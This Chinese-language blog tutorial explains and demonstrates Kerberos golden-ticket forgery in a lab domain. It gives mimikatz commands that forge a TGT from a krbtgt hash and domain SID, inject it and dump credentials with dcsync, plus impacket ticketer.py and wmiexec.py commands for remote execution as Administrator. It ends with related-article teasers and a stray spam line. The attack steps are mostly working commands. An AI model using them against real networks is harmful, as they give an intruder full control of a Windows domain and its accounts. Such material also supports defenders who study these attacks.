<menu id="guoca"></menu>
<nav id="guoca"></nav><xmp id="guoca">
  • <xmp id="guoca">
  • <nav id="guoca"><code id="guoca"></code></nav>
  • <nav id="guoca"><code id="guoca"></code></nav>

    黃金票據的制作與使用

    VSole2021-09-28 08:52:39

    原理

    黃金票據的原理就是用krbtgt的hash來偽造TGT的內容。更改里面的client參數與session key等。讓TGS以為我就是那個我所聲稱的人,當然我一般會聲稱自己是administrator。第四步主要是來驗證客戶端的身份。

    所謂的黃金票據其實就是kerberos認證的第二個階段中的tgs的ticket也就是TGT。這個ticket相當于對請求端的一個身份認證的憑據,如果可以偽造這個ticket,那么就可以偽造任意身份,而黃金票據就是一個實現方式。

    kerberos協議原理請參考:NTML認證與kerberos認證與PAC相關知識。

    前置條件

    1.krbtgt的hash

    2.本地管理員權限

    3.域的sid(普通用戶的sid除去最后三位就是域的sid)

    4.域內任意用戶的本地管理員權限

    操作步驟

    清空已有票據

    kerberos::purge

    制作黃金票據

    kerberos::golden/user:Administrator/domain:test.com/sid:S-1-5-21-4166986646-4168497534-2490551922 /krbtgt:308390d1ca7addf22c84ba9f1d26cbe4 /ticket:1.kirbi

    加載黃金票據

    kerberos::ptt 1.kirbi

    檢測成果

    lsadump::dcsync /domain:test.com /user:krbtgt

    使用mimikatz實現

    mimikatz下載地址:https://github.com/gentilkiwi/mimikatz/releases

    假設我們已經通過某種方式獲得了域控的krbtgt的hash為d8d2ad72a119a8d418703f7a16580af6。

    1.開啟一個管理員權限的cmd窗口

    2.使用mimikatz

    第一步:提權&清空票據

    klist purge #在cmd中執行

    privilege::Debug

    kerberos::purge

    kerberos::list

    第二步:制作黃金票據

    獲得域sid:S-1-5-21-3763276348-88739081-2848684050-1110

    執行命令:

    kerberos::golden /user:Administrator /domain:test.com /sid:S-1-5-21-3763276348-88739081-2848684050 /krbtgt:d8d2ad72a119a8d418703f7a16580af6 /ticket:1.kirbi

    執行結束后,會在運行目錄生成一個1.kirbi的文件。

    第三步:使用黃金票據

    這時候我們先看看能不能使用dcsync命令,這個命令是只有域控權限才能使用的,作用是導出域內所有用戶的賬號密碼。當然結果肯定是失敗的:

    因為我們并沒有域控的“身份證”也就是tgt。

    這時候我們將剛制作好的偽造的tgt導入系統并進行測試:

    kerberos::ptt 1.kirbi

    lsadump::dcsync /domain:test.com /user:krbtgt

    遇到的一些坑

    做完票據后執行lsadump::dcsync /domain:test.com /user:krbtgt會報錯。后來研究了很久才發現,只要稍等幾分鐘然后測試執行那個命令就會成功,或者退出mimikatz再進去就可以成功,原理我也不知道。

    這種票據只會存在管理員權限的命令行窗口中,如果這時候換一個命令行窗口執行,就會發現沒有這個憑證。

    利用impacket實現

    原理跟利用mimikatz一樣,只是利用的工具不一樣而已。

    實現

    第一步:打開管理員權限的命令行窗口并清空票據

    第二步:制作ccache文件

    python ticketer.py -nthash d8d2ad72a119a8d418703f7a16580af6 -domain-sid S-1-5-21-3763276348-88739081-2848684050 -domain test.com administrator

    第三步:更改環境變量

    set KRB5CCNAME=C:\Users\zhangsan\Desktop\impacket-examples-windows-master\administrator.ccache

    第四步:驗證成果

    python wmiexec.py test.com/administrator@yukong -k -no-pass

    總結

    利用impacket來進行票據的制作有一定的局限性,制作完票據后在klist命令下是看不到緩存的。也沒辦法使用net use \\ip\admin$ 來建立管道連接。但可以使用其自帶的工具在在一定的命令格式下進行遠控指定主機。命令格式為:

    xxxx.py domain/username@hostname -k -no-pass

    這里的domain必須跟systeminfo中的domain的值一樣。

    hostname 可以通過net view命令,或者nbtstat -A ip,或者ping -a ip來確定,推薦ping -a命令。

    因為test為域名,所以yukong就為主機名。

    FQDN是什么?
    FQDN是完全合格域名/全程域名縮寫,Fully Qualified Domain Name,即是域名,訪問時將由DNS進行解析,得到IP。FQDN = Hostname + DomainName,舉個例子,一個公司申請了域名comp.com,這時候有一臺主機名為web,則可以使用web.comp.com得到這個主機IP。若還有兩臺提供郵件和OA服務的主機cmail,oa,則這時候可以用以下FQDN:
    cmail.comp.com
    oa.comp.com

    impacket的更多用法請看下面這篇文章:

    https://blog.csdn.net/qq_41874930/article/details/108253531

    domain票據
    本作品采用《CC 協議》,轉載必須注明作者和本文鏈接
    上網搜索這個hdhcms是開源的,我們下載源碼,搜索我們需要利用的文件。上線后第一步,查看自己所獲取的權限whoami。可惜,
    原理黃金票據的原理就是用krbtgt的hash來偽造TGT的內容。第四步主要是來驗證客戶端的身份。所謂的黃金票據其實就是kerberos認證的第二個階段中的tgs的ticket也就是TGT。
    客戶端收到該信息,使用自己的密碼進行解密之后,得到TGT票據。客戶端將服務請求與該ticket一并發送給相應的服務端即可。0x02 Kerberos協議具體流程 用戶登陸 用戶使用客戶端上的程序進行登陸。客戶端認證 客戶端從認證服務器獲取票據授權票據Ticket Granting Ticket簡稱TGT。服務器Server向客戶端Client提供相應的服務。0x03 白銀票據Silver Ticket偽造 白銀票據偽造的是TGS的票據,是一個點對點的有效憑證。
    當攻擊者獲取到域內krbtgt帳戶的SID和HASH,就可以隨意偽造域內管理員用戶,再加上域帳戶krbtgt的密碼基本不會更改,即使域管修改了密碼,攻擊者依然可以通過黃金票據獲取域管理員權限。在域環境中,黃金票據無疑是一種特別危險的攻擊,是域控權限失陷的特征,基于AD Event日志如何檢測黃金票據攻擊,我們來研究一下。利用mimikatz在域控服務器導出krbtgt的SID值和哈希值。
    Kerberos認證介紹Kerberos是一種計算機網絡授權協議,用來在非安全網絡中,對個人通信以安全的手段進行身份認證。這個詞又指麻省理工學院為這個協議開發的一套計算機軟件。而已有了金票后,就跳過AS驗證,不用驗證賬戶和密碼,所以也不擔心域管密碼修改。
    在了解票據攻擊的過程中,看見了一篇文章使用Rubeus進行鉆石票據攻擊。但是沒有原理,于是抱著學習的心態在Google上尋找文章發現除了鉆石票據還有藍寶石票據
    域滲透就是基于windows域環境的滲透,而域滲透涉及到的技術,如哈希傳遞(PTH)票據傳遞(PTT)委派攻擊等,都是基于域環境下的認證機制來實現的,這也是為什么要了解Windows認證機制的原因之一Windows的認證包括三個部分,用戶直接操作計算機登陸賬戶(本地認證),遠程連接到工作組中的某個設備(網絡認證),登陸到域環境中的某個設備(域認證)
    金票可以使用krbtgt的NTLM hash創建作為任何用戶的有效TGT。
    接管域控或權限提升
    攻擊者在獲取到域控權限后,可以利用約束委派或者基于資源的約束委派實現后門,以實現達到維持權限的目的。基于AD Event日志監視對特定 Active Directory 屬性的修改,從而發現可疑的域委派后門。設置約束委派setspn -U -A cifs/test test
    VSole
    網絡安全專家
      亚洲 欧美 自拍 唯美 另类